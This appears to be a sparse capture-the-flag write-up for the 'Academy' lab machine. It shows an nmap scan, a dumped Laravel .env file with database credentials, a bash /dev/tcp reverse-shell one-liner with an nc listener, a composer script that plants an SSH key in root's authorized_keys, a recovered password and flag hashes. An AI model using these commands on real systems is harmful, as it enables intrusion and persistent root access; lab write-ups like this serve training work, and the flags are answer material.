# Academy

By [Avalon](https://paragraph.com/@avalon-2) · 2021-12-01

---

    # Nmap 7.91 scan initiated Sun Nov 29 13:49:16 2020 as: nmap -sC -sV -Pn -oA Academy 10.10.10.215
    Nmap scan report for 10.10.10.215
    Host is up (0.24s latency).
    Not shown: 997 closed ports
    PORT   STATE    SERVICE      VERSION
    22/tcp open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
    |   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
    |_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
    80/tcp open     http         Apache httpd 2.4.41 ((Ubuntu))
    |_http-title: Did not follow redirect to http://academy.htb/
    88/tcp filtered kerberos-sec
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sun Nov 29 13:54:29 2020 -- 1 IP address (1 host up) scanned in 312.78 seconds
    

### Modify Hosts

    10.10.10.215 academy.htb
    

### User Access

![](https://storage.googleapis.com/papyrus_images/d56756919285bb3045984b62dfd47f24d65d5625adb6d865ee135920ee784ee0.png)

### Modify Hosts Again

    10.10.10.215 academy.htb dev-staging-01.academy.htb
    

### Visit [http://dev-staging-01.academy.htb](http://dev-staging-01.academy.htb)

Found the keyword Laravel
-------------------------

    Command ~> cat /var/www/html/academy/.env
    
    APP_NAME=Laravel
    APP_ENV=local
    APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
    APP_DEBUG=false
    APP_URL=http://localhost
    
    LOG_CHANNEL=stack
    
    DB_CONNECTION=mysql
    DB_HOST=127.0.0.1
    DB_PORT=3306
    DB_DATABASE=academy
    DB_USERNAME=dev
    DB_PASSWORD=mySup3rP4s5w0rd!!
    
    BROADCAST_DRIVER=log
    CACHE_DRIVER=file
    SESSION_DRIVER=file
    SESSION_LIFETIME=120
    QUEUE_DRIVER=sync
    
    REDIS_HOST=127.0.0.1
    REDIS_PASSWORD=null
    REDIS_PORT=6379
    
    MAIL_DRIVER=smtp
    MAIL_HOST=smtp.mailtrap.io
    MAIL_PORT=2525
    MAIL_USERNAME=null
    MAIL_PASSWORD=null
    MAIL_ENCRYPTION=null
    
    PUSHER_APP_ID=
    PUSHER_APP_KEY=
    PUSHER_APP_SECRET=
    PUSHER_APP_CLUSTER=mt1
    
    MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
    MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
    

    remote
    nc -l 1234
    
    local
    bash -c 'bash -i >& /dev/tcp/10.10.15.XX/1234 0>&1'
    

b11122e303dae8ceeee215804f60a119

![](https://storage.googleapis.com/papyrus_images/c543e2014724ed3b3c6144baac5083eb17983bbd2887d9875cf2de251cc14775.png)

![](https://storage.googleapis.com/papyrus_images/c7d5136feb02215fcc0d6a420ce6f4aec66946b4523bb83fbb523169c5d03346.png)

mrb3n\_Ac@d3my!

    {
      "scripts": {
        "command": "mkdir /root/.ssh; echo 'ssh-rsa <public-key> xiaming@bixin.cn' >> /root/.ssh/authorized_keys"
      }
    }
    

![](https://storage.googleapis.com/papyrus_images/93288b394c70248263a9965e9086a0dd4fd939fd1e9a5b2123771c63988c9f8b.png)

![](https://storage.googleapis.com/papyrus_images/fc00b66df193743541d3bfb6e4825a2016a784a1beb0617084c09f90defb5665.png)

e8065ea83707204ed3f153f94cbddbb7

---

*Originally published on [Avalon](https://paragraph.com/@avalon-2/academy)*
